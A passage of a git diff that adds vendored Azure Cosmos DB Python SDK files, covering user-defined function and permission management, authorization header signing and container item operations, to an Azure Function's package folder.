in the container. + + :keyword int max_item_count: Max number of items to be returned in the enumeration operation. + :returns: An AsyncItemPaged of user-defined functions (dicts). + :rtype: AsyncItemPaged[Dict[str, Any]] + """ + feed_options = _build_options(kwargs) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + return self.client_connection.ReadUserDefinedFunctions( + collection_link=self.container_link, options=feed_options, **kwargs + ) + + @distributed_trace + def query_user_defined_functions( + self, + query: Union[str, Dict[str, Any]], + **kwargs: Any + ) -> AsyncItemPaged[Dict[str, Any]]: + """Return user-defined functions matching a given `query`. + + :param Union[str, Dict[str, Any]] query: The Azure Cosmos DB SQL query to execute. + :keyword parameters: Optional array of parameters to the query. Ignored if no query is provided. + :paramtype parameters: List[Dict[str, Any]] + :keyword int max_item_count: Max number of items to be returned in the enumeration operation. + :returns: An AsyncItemPaged of user-defined functions (dicts). + :rtype: AsyncItemPaged[Dict[str, Any]] + """ + feed_options = _build_options(kwargs) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + parameters = kwargs.pop('parameters', None) + return self.client_connection.QueryUserDefinedFunctions( + collection_link=self.container_link, + query=query if parameters is None else dict(query=query, parameters=parameters), + options=feed_options, + **kwargs + ) + + @distributed_trace_async + async def get_user_defined_function(self, udf: Union[str, Dict[str, Any]], **kwargs: Any) -> Dict[str, Any]: + """Get a user-defined function identified by `id`. + + :param udf: The ID (name) or dict representing udf to retrieve. + :type udf: Union[str, Dict[str, Any]] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the user-defined function couldn't be retrieved. + :returns: A dict representing the retrieved user-defined function. + :rtype: Dict[str, Any] + """ + request_options = _build_options(kwargs) + + return await self.client_connection.ReadUserDefinedFunction( + udf_link=self._get_resource_link(udf, ScriptType.UserDefinedFunction), options=request_options, **kwargs + ) + + @distributed_trace_async + async def create_user_defined_function(self, body: Dict[str, Any], **kwargs: Any) -> Dict[str, Any]: + """Create a user-defined function in the container. + + To replace an existing user-defined function, use the + :func:`ContainerProxy.scripts.replace_user_defined_function` method. + + :param Dict[str, Any] body: A dict-like object representing the user-defined function to create. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the user-defined function couldn't be created. + :returns: A dict representing the new user-defined function. + :rtype: Dict[str, Any] + """ + request_options = _build_options(kwargs) + + return await self.client_connection.CreateUserDefinedFunction( + collection_link=self.container_link, udf=body, options=request_options, **kwargs + ) + + @distributed_trace_async + async def replace_user_defined_function( + self, + udf: Union[str, Dict[str, Any]], + body: Dict[str, Any], + **kwargs: Any + ) -> Dict[str, Any]: + """Replace a specified user-defined function in the container. + + If the user-defined function does not already exist in the container, an exception is raised. + + :param udf: The ID (name) or dict representing user-defined function to be replaced. + :type udf: Union[str, Dict[str, Any]] + :param Dict[str, Any] body: A dict-like object representing the udf to replace. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the replace failed or the user-defined function + with the given id does not exist. + :returns: A dict representing the user-defined function after replace went through. + :rtype: Dict[str, Any] + """ + request_options = _build_options(kwargs) + + return await self.client_connection.ReplaceUserDefinedFunction( + udf_link=self._get_resource_link(udf, ScriptType.UserDefinedFunction), + udf=body, + options=request_options, + **kwargs + ) + + @distributed_trace_async + async def delete_user_defined_function(self, udf: Union[str, Dict[str, Any]], **kwargs: Any) -> None: + """Delete a specified user-defined function from the container. + + If the user-defined function does not already exist in the container, an exception is raised. + + :param udf: The ID (name) or dict representing udf to be deleted. + :type udf: Union[str, Dict[str, Any]] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The udf wasn't deleted successfully. + :raises ~azure.cosmos.exceptions.CosmosResourceNotFoundError: The UDF does not exist in the container. + :rtype: None + """ + request_options = _build_options(kwargs) + + await self.client_connection.DeleteUserDefinedFunction( + udf_link=self._get_resource_link(udf, ScriptType.UserDefinedFunction), options=request_options, **kwargs + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_user.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_user.py new file mode 100644 index 0000000..d1be685 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_user.py @@ -0,0 +1,318 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +# pylint: disable=missing-client-constructor-parameter-credential,missing-client-constructor-parameter-kwargs + +"""Create, read, update and delete users in the Azure Cosmos DB SQL API service. +""" + +from typing import Any, Dict, Union, cast +from azure.core.async_paging import AsyncItemPaged + +from azure.core.tracing.decorator_async import distributed_trace_async +from azure.core.tracing.decorator import distributed_trace + +from ._cosmos_client_connection_async import CosmosClientConnection +from .._base import build_options +from ..permission import Permission + + +class UserProxy(object): + """An interface to interact with a specific user. + + This class should not be instantiated directly. Instead, use the + :func:`DatabaseProxy.get_user_client` method. + """ + + def __init__( + self, + client_connection: CosmosClientConnection, + id: str, # pylint: disable=redefined-builtin + database_link: str, + properties: Dict[str, Any] = None + ) -> None: + self.client_connection = client_connection + self.id = id + self.user_link = u"{}/users/{}".format(database_link, id) + self._properties = properties + + def __repr__(self) -> str: + return "".format(self.user_link)[:1024] + + def _get_permission_link(self, permission_or_id: Union[Permission, str, Dict[str, Any]]) -> str: + if isinstance(permission_or_id, str): + return u"{}/permissions/{}".format(self.user_link, permission_or_id) + try: + return cast("Permission", permission_or_id).permission_link + except AttributeError: + pass + return u"{}/permissions/{}".format(self.user_link, cast("Dict[str, str]", permission_or_id)["id"]) + + async def _get_properties(self) -> Dict[str, Any]: + if self._properties is None: + self._properties = await self.read() + return self._properties + + @distributed_trace_async + async def read(self, **kwargs: Any) -> Dict[str, Any]: + """Read user properties. + + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given user couldn't be retrieved. + :returns: A dictionary of the retrieved user properties. + :rtype: Dict[str, Any] + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + self._properties = await self.client_connection.ReadUser(user_link=self.user_link, + options=request_options, **kwargs) + + if response_hook: + response_hook(self.client_connection.last_response_headers, self._properties) + + return cast('Dict[str, Any]', self._properties) + + @distributed_trace + def list_permissions(self, **kwargs: Any) -> AsyncItemPaged[Dict[str, Any]]: + """List all permission for the user. + + :keyword int max_item_count: Max number of permissions to be returned in the enumeration operation. + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], AsyncItemPaged[Dict[str, Any]], None] + :returns: An AsyncItemPaged of permissions (dicts). + :rtype: AsyncItemPaged[Dict[str, Any]] + """ + feed_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + result = self.client_connection.ReadPermissions(user_link=self.user_link, options=feed_options, **kwargs) + + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + + return result + + @distributed_trace + def query_permissions( + self, + query: Union[str, Dict[str, Any]], + **kwargs: Any + ) -> AsyncItemPaged[Dict[str, Any]]: + """Return all permissions matching the given `query`. + + :param Union[str, Dict[str, Any]] query: The Azure Cosmos DB SQL query to execute. + :keyword parameters: Optional array of parameters to the query. Ignored if no query is provided. + :paramtype parameters: Optional[List[Dict[str, Any]]] + :keyword int max_item_count: Max number of permissions to be returned in the enumeration operation. + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], AsyncItemPaged[Dict[str, Any]]], None] + :returns: An AsyncItemPaged of permissions (dicts). + :rtype: AsyncItemPaged[Dict[str, Any]] + """ + feed_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + parameters = kwargs.pop('parameters', None) + result = self.client_connection.QueryPermissions( + user_link=self.user_link, + query=query if parameters is None else dict(query=query, parameters=parameters), + options=feed_options, + **kwargs + ) + + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + + return result + + @distributed_trace_async + async def get_permission( + self, + permission: Union[str, Dict[str, Any], Permission], + **kwargs: Any + ) -> Permission: + """Get the permission identified by `id`. + + :param permission: The ID (name), dict representing the properties or :class:`Permission` + instance of the permission to be retrieved. + :type permission: Union[str, Dict[str, Any], ~azure.cosmos.Permission] + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given permission couldn't be retrieved. + :returns: The retrieved permission object. + :rtype: ~azure.cosmos.Permission + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + permission_resp = await self.client_connection.ReadPermission( + permission_link=self._get_permission_link(permission), options=request_options, **kwargs + ) # type: Dict[str, str] + + if response_hook: + response_hook(self.client_connection.last_response_headers, permission_resp) + + return Permission( + id=permission_resp["id"], + user_link=self.user_link, + permission_mode=permission_resp["permissionMode"], + resource_link=permission_resp["resource"], + properties=permission_resp, + ) + + @distributed_trace_async + async def create_permission(self, body: Dict[str, Any], **kwargs: Any) -> Permission: + """Create a permission for the user. + + To update or replace an existing permission, use the :func:`UserProxy.upsert_permission` method. + + :param body: A dict-like object representing the permission to create. + :type body: Dict[str, Any] + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given permission couldn't be created. + :returns: A permission object representing the new permission. + :rtype: ~azure.cosmos.Permission + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + permission = await self.client_connection.CreatePermission( + user_link=self.user_link, permission=body, options=request_options, **kwargs + ) + + if response_hook: + response_hook(self.client_connection.last_response_headers, permission) + + return Permission( + id=permission["id"], + user_link=self.user_link, + permission_mode=permission["permissionMode"], + resource_link=permission["resource"], + properties=permission, + ) + + @distributed_trace_async + async def upsert_permission(self, body: Dict[str, Any], **kwargs: Any) -> Permission: + """Insert or update the specified permission. + + If the permission already exists in the container, it is replaced. If + the permission does not exist, it is inserted. + + :param body: A dict-like object representing the permission to update or insert. + :type body: Dict[str, Any] + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given permission could not be upserted. + :returns: A dict representing the upserted permission. + :rtype: ~azure.cosmos.Permission + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + permission = await self.client_connection.UpsertPermission( + user_link=self.user_link, permission=body, options=request_options, **kwargs + ) + + if response_hook: + response_hook(self.client_connection.last_response_headers, permission) + + return Permission( + id=permission["id"], + user_link=self.user_link, + permission_mode=permission["permissionMode"], + resource_link=permission["resource"], + properties=permission, + ) + + @distributed_trace_async + async def replace_permission( + self, + permission: Union[str, Dict[str, Any], Permission], + body: Dict[str, Any], + **kwargs: Any + ) -> Permission: + """Replaces the specified permission if it exists for the user. + + If the permission does not already exist, an exception is raised. + + :param permission: The ID (name), dict representing the properties or :class:`Permission` + instance of the permission to be replaced. + :type permission: Union[str, Dict[str, Any], ~azure.cosmos.Permission] + :param body: A dict-like object representing the permission to replace. + :type body: Dict[str, Any] + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the replace failed or the permission + with given id does not exist. + :returns: A permission object representing the permission after the replace went through. + :rtype: ~azure.cosmos.Permission + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + permission_resp = await self.client_connection.ReplacePermission( + permission_link=self._get_permission_link(permission), permission=body, options=request_options, **kwargs + ) # type: Dict[str, str] + + if response_hook: + response_hook(self.client_connection.last_response_headers, permission_resp) + + return Permission( + id=permission_resp["id"], + user_link=self.user_link, + permission_mode=permission_resp["permissionMode"], + resource_link=permission_resp["resource"], + properties=permission_resp, + ) + + @distributed_trace_async + async def delete_permission(self, permission: Union[str, Dict[str, Any], Permission], **kwargs: Any) -> None: + """Delete the specified permission from the user. + + If the permission does not already exist, an exception is raised. + + :param permission: The ID (name), dict representing the properties or :class:`Permission` + instance of the permission to be deleted. + :type permission: Union[str, Dict[str, Any], ~azure.cosmos.Permission] + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], None], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The permission wasn't deleted successfully. + :raises ~azure.cosmos.exceptions.CosmosResourceNotFoundError: The permission does not exist for the user. + :rtype: None + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + result = await self.client_connection.DeletePermission( + permission_link=self._get_permission_link(permission), options=request_options, **kwargs + ) + + if response_hook: + response_hook(self.client_connection.last_response_headers, result) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/auth.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/auth.py new file mode 100644 index 0000000..14d78c8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/auth.py @@ -0,0 +1,156 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Authorization helper functions in the Azure Cosmos database service. +""" + +import base64 +from hashlib import sha256 +import hmac +import warnings +import urllib.parse +from . import http_constants + + +def GetAuthorizationHeader( + cosmos_client_connection, verb, path, resource_id_or_fullname, is_name_based, resource_type, headers +): + warnings.warn("This method has been deprecated and will be removed from the SDK in a future release.", + DeprecationWarning) + + return _get_authorization_header( + cosmos_client_connection, verb, path, resource_id_or_fullname, is_name_based, resource_type, headers) + + +def _get_authorization_header( + cosmos_client_connection, verb, path, resource_id_or_fullname, is_name_based, resource_type, headers +): + """Gets the authorization header. + + :param cosmos_client_connection.CosmosClient cosmos_client: + :param str verb: + :param str path: + :param str resource_id_or_fullname: + :param str resource_type: + :param dict headers: + :return: The authorization headers. + :rtype: str + """ + # In the AuthorizationToken generation logic, lower casing of ResourceID is required + # as rest of the fields are lower cased. Lower casing should not be done for named + # based "ID", which should be used as is + if resource_id_or_fullname is not None and not is_name_based: + resource_id_or_fullname = resource_id_or_fullname.lower() + + if cosmos_client_connection.master_key: + return __get_authorization_token_using_master_key( + verb, resource_id_or_fullname, resource_type, headers, cosmos_client_connection.master_key + ) + if cosmos_client_connection.resource_tokens: + return __get_authorization_token_using_resource_token( + cosmos_client_connection.resource_tokens, path, resource_id_or_fullname + ) + + return None + + +def __get_authorization_token_using_master_key(verb, resource_id_or_fullname, resource_type, headers, master_key): + """Gets the authorization token using `master_key. + + :param str verb: + :param str resource_id_or_fullname: + :param str resource_type: + :param dict headers: + :param str master_key: + :return: The authorization token. + :rtype: dict + + """ + + # decodes the master key which is encoded in base64 + key = base64.b64decode(master_key) + + # Skipping lower casing of resource_id_or_fullname since it may now contain "ID" + # of the resource as part of the fullname + text = "{verb}\n{resource_type}\n{resource_id_or_fullname}\n{x_date}\n{http_date}\n".format( + verb=(verb.lower() or ""), + resource_type=(resource_type.lower() or ""), + resource_id_or_fullname=(resource_id_or_fullname or ""), + x_date=headers.get(http_constants.HttpHeaders.XDate, "").lower(), + http_date=headers.get(http_constants.HttpHeaders.HttpDate, "").lower(), + ) + + body = text.encode("utf-8") + digest = hmac.new(key, body, sha256).digest() + signature = base64.encodebytes(digest).decode("utf-8") + + master_token = "master" + token_version = "1.0" + return "type={type}&ver={ver}&sig={sig}".format(type=master_token, ver=token_version, sig=signature[:-1]) + + +def __get_authorization_token_using_resource_token(resource_tokens, path, resource_id_or_fullname): + """Get the authorization token using `resource_tokens`. + + :param dict resource_tokens: + :param str path: + :param str resource_id_or_fullname: + :return: The authorization token. + :rtype: dict + + """ + if resource_tokens: + # For database account access(through GetDatabaseAccount API), path and + # resource_id_or_fullname are '', so in this case we return the first token to be + # used for creating the auth header as the service will accept any token in this case + path = urllib.parse.unquote(path) + if not path and not resource_id_or_fullname: + for value in resource_tokens.values(): + return value + + if resource_tokens.get(resource_id_or_fullname): + return resource_tokens[resource_id_or_fullname] + + path_parts = [] + if path: + path_parts = [item for item in path.split("/") if item] + resource_types = [ + "dbs", + "colls", + "docs", + "sprocs", + "udfs", + "triggers", + "users", + "permissions", + "attachments", + "conflicts", + "offers", + ] + + # Get the last resource id or resource name from the path and get it's token from resource_tokens + for i in range(len(path_parts), 1, -1): + segment = path_parts[i - 1] + sub_path = "/".join(path_parts[:i]) + if not segment in resource_types and sub_path in resource_tokens: + return resource_tokens[sub_path] + + return None diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/container.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/container.py new file mode 100644 index 0000000..d062d1a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/container.py @@ -0,0 +1,822 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Create, read, update and delete items in the Azure Cosmos DB SQL API service. +""" + + +from typing import Any, Dict, List, Optional, Union, Iterable, cast, overload # pylint: disable=unused-import + +import warnings +from azure.core.tracing.decorator import distributed_trace # type: ignore + +from ._cosmos_client_connection import CosmosClientConnection +from ._base import build_options, validate_cache_staleness_value +from .exceptions import CosmosResourceNotFoundError +from .http_constants import StatusCodes +from .offer import ThroughputProperties +from .scripts import ScriptsProxy +from .partition_key import NonePartitionKeyValue + +__all__ = ("ContainerProxy",) + +# pylint: disable=protected-access +# pylint: disable=missing-client-constructor-parameter-credential,missing-client-constructor-parameter-kwargs + + +class ContainerProxy(object): + """An interface to interact with a specific DB Container. + + This class should not be instantiated directly. Instead, use the + :func:`~azure.cosmos.database.DatabaseProxy.get_container_client` method to get an existing + container, or the :func:`~azure.cosmos.database.DatabaseProxy.create_container` method to create a + new container. + + A container in an Azure Cosmos DB SQL API database is a collection of + documents, each of which is represented as an Item. + + :ivar str id: ID (name) of the container + :ivar str session_token: The session token for the container. + """ + + def __init__(self, client_connection, database_link, id, properties=None): # pylint: disable=redefined-builtin + # type: (CosmosClientConnection, str, str, Dict[str, Any]) -> None + self.client_connection = client_connection + self.id = id + self._properties = properties + self.container_link = u"{}/colls/{}".format(database_link, self.id) + self._is_system_key = None + self._scripts = None # type: Optional[ScriptsProxy] + + def __repr__(self): + # type () -> str + return "".format(self.container_link)[:1024] + + def _get_properties(self): + # type: () -> Dict[str, Any] + if self._properties is None: + self._properties = self.read() + return self._properties + + @property + def is_system_key(self): + # type: () -> bool + if self._is_system_key is None: + properties = self._get_properties() + self._is_system_key = ( + properties["partitionKey"]["systemKey"] if "systemKey" in properties["partitionKey"] else False + ) + return cast('bool', self._is_system_key) + + @property + def scripts(self): + # type: () -> ScriptsProxy + if self._scripts is None: + self._scripts = ScriptsProxy(self.client_connection, self.container_link, self.is_system_key) + return cast('ScriptsProxy', self._scripts) + + def _get_document_link(self, item_or_link): + # type: (Union[Dict[str, Any], str]) -> str + if isinstance(item_or_link, str): + return u"{}/docs/{}".format(self.container_link, item_or_link) + return item_or_link["_self"] + + def _get_conflict_link(self, conflict_or_link): + # type: (Union[Dict[str, Any], str]) -> str + if isinstance(conflict_or_link, str): + return u"{}/conflicts/{}".format(self.container_link, conflict_or_link) + return conflict_or_link["_self"] + + def _set_partition_key(self, partition_key): + if partition_key == NonePartitionKeyValue: + return CosmosClientConnection._return_undefined_or_empty_partition_key(self.is_system_key) + return partition_key + + @overload + def read( + self, + *, + populate_partition_key_range_statistics: Optional[bool] = None, + populate_quota_info: Optional[bool] = None, + **kwargs + ): + ... + + + @distributed_trace + def read( + self, + *args, + **kwargs # type: Any + ): + # type: (...) -> Dict[str, Any] + """Read the container properties. + + :keyword bool populate_partition_key_range_statistics: Enable returning partition key + range statistics in response headers. + :keyword bool populate_quota_info: Enable returning collection storage quota information in response headers. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request. + :keyword Callable response_hook: A callable invoked with the response metadata. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: Raised if the container couldn't be retrieved. + This includes if the container does not exist. + :returns: Dict representing the retrieved container. + :rtype: dict[str, Any] + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + populate_query_metrics = args[0] if args else kwargs.pop('populate_query_metrics', None) + if populate_query_metrics: + warnings.warn( + "the populate_query_metrics flag does not apply to this method and will be removed in the future", + UserWarning, + ) + populate_partition_key_range_statistics = args[1] if args and len(args) > 0 else kwargs.pop( + "populate_partition_key_range_statistics", None) + populate_quota_info = args[2] if args and len(args) > 1 else kwargs.pop("populate_quota_info", None) + if populate_partition_key_range_statistics is not None: + request_options["populatePartitionKeyRangeStatistics"] = populate_partition_key_range_statistics + if populate_quota_info is not None: + request_options["populateQuotaInfo"] = populate_quota_info + + collection_link = self.container_link + self._properties = self.client_connection.ReadContainer( + collection_link, options=request_options, **kwargs + ) + + if response_hook: + response_hook(self.client_connection.last_response_headers, self._properties) + + return cast('Dict[str, Any]', self._properties) + + @distributed_trace + def read_item( + self, + item, # type: Union[str, Dict[str, Any]] + partition_key, # type: Any + populate_query_metrics=None, # type: Optional[bool] + post_trigger_include=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> Dict[str, Any] + """Get the item identified by `item`. + + :param item: The ID (name) or dict representing item to retrieve. + :param partition_key: Partition key for the item to retrieve. + :param post_trigger_include: trigger id to be used as post operation trigger. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request. + :keyword Callable response_hook: A callable invoked with the response metadata. + **Provisional** keyword argument max_integrated_cache_staleness_in_ms + :keyword int max_integrated_cache_staleness_in_ms: + The max cache staleness for the integrated cache in milliseconds. + For accounts configured to use the integrated cache, using Session or Eventual consistency, + responses are guaranteed to be no staler than this value. + :returns: Dict representing the item to be retrieved. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The given item couldn't be retrieved. + :rtype: dict[str, Any] + + .. admonition:: Example: + + .. literalinclude:: ../samples/examples.py + :start-after: [START update_item] + :end-before: [END update_item] + :language: python + :dedent: 0 + :caption: Get an item from the database and update one of its properties: + :name: update_item + """ + doc_link = self._get_document_link(item) + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + if partition_key is not None: + request_options["partitionKey"] = self._set_partition_key(partition_key) + if populate_query_metrics is not None: + warnings.warn( + "the populate_query_metrics flag does not apply to this method and will be removed in the future", + UserWarning, + ) + request_options["populateQueryMetrics"] = populate_query_metrics + if post_trigger_include is not None: + request_options["postTriggerInclude"] = post_trigger_include + max_integrated_cache_staleness_in_ms = kwargs.pop('max_integrated_cache_staleness_in_ms', None) + if max_integrated_cache_staleness_in_ms is not None: + validate_cache_staleness_value(max_integrated_cache_staleness_in_ms) + request_options["maxIntegratedCacheStaleness"] = max_integrated_cache_staleness_in_ms + + result = self.client_connection.ReadItem(document_link=doc_link, options=request_options, **kwargs) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace + def read_all_items( + self, + max_item_count=None, # type: Optional[int] + populate_query_metrics=None, # type: Optional[bool] + **kwargs # type: Any + ): + # type: (...) -> Iterable[Dict[str, Any]] + """List all the items in the container. + + :param max_item_count: Max number of items to be returned in the enumeration operation. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request. + :keyword Callable response_hook: A callable invoked with the response metadata. + **Provisional** keyword argument max_integrated_cache_staleness_in_ms + :keyword int max_integrated_cache_staleness_in_ms: + The max cache staleness for the integrated cache in milliseconds. + For accounts configured to use the integrated cache, using Session or Eventual consistency, + responses are guaranteed to be no staler than this value. + :returns: An Iterable of items (dicts). + :rtype: Iterable[dict[str, Any]] + """ + feed_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + if populate_query_metrics is not None: + warnings.warn( + "the populate_query_metrics flag does not apply to this method and will be removed in the future", + UserWarning, + ) + feed_options["populateQueryMetrics"] = populate_query_metrics + max_integrated_cache_staleness_in_ms = kwargs.pop('max_integrated_cache_staleness_in_ms', None) + if max_integrated_cache_staleness_in_ms: + validate_cache_staleness_value(max_integrated_cache_staleness_in_ms) + feed_options["maxIntegratedCacheStaleness"] = max_integrated_cache_staleness_in_ms + + if hasattr(response_hook, "clear"): + response_hook.clear() + + items = self.client_connection.ReadItems( + collection_link=self.container_link, feed_options=feed_options, response_hook=response_hook, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, items) + return items + + @distributed_trace + def query_items_change_feed( + self, + partition_key_range_id=None, # type: Optional[str] + is_start_from_beginning=False, # type: bool + continuation=None, # type: Optional[str] + max_item_count=None, # type: Optional[int] + **kwargs # type: Any + ): + # type: (...) -> Iterable[Dict[str, Any]] + """Get a sorted list of items that were changed, in the order in which they were modified. + + :param partition_key_range_id: ChangeFeed requests can be executed against specific partition key ranges. + This is used to process the change feed in parallel across multiple consumers. + :param partition_key: partition key at which ChangeFeed requests are targetted. + :param is_start_from_beginning: Get whether change feed should start from + beginning (true) or from current (false). By default it's start from current (false). + :param continuation: e_tag value to be used as continuation for reading change feed. + :param max_item_count: Max number of items to be returned in the enumeration operation. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: An Iterable of items (dicts). + :rtype: Iterable[dict[str, Any]] + """ + feed_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + if partition_key_range_id is not None: + feed_options["partitionKeyRangeId"] = partition_key_range_id + partition_key = kwargs.pop("partitionKey", None) + if partition_key is not None: + feed_options["partitionKey"] = partition_key + if is_start_from_beginning is not None: + feed_options["isStartFromBeginning"] = is_start_from_beginning + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + if continuation is not None: + feed_options["continuation"] = continuation + + if hasattr(response_hook, "clear"): + response_hook.clear() + + result = self.client_connection.QueryItemsChangeFeed( + self.container_link, options=feed_options, response_hook=response_hook, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace + def query_items( + self, + query, # type: str + parameters=None, # type: Optional[List[Dict[str, object]]] + partition_key=None, # type: Optional[Any] + enable_cross_partition_query=None, # type: Optional[bool] + max_item_count=None, # type: Optional[int] + enable_scan_in_query=None, # type: Optional[bool] + populate_query_metrics=None, # type: Optional[bool] + **kwargs # type: Any + ): + # type: (...) -> Iterable[Dict[str, Any]] + """Return all results matching the given 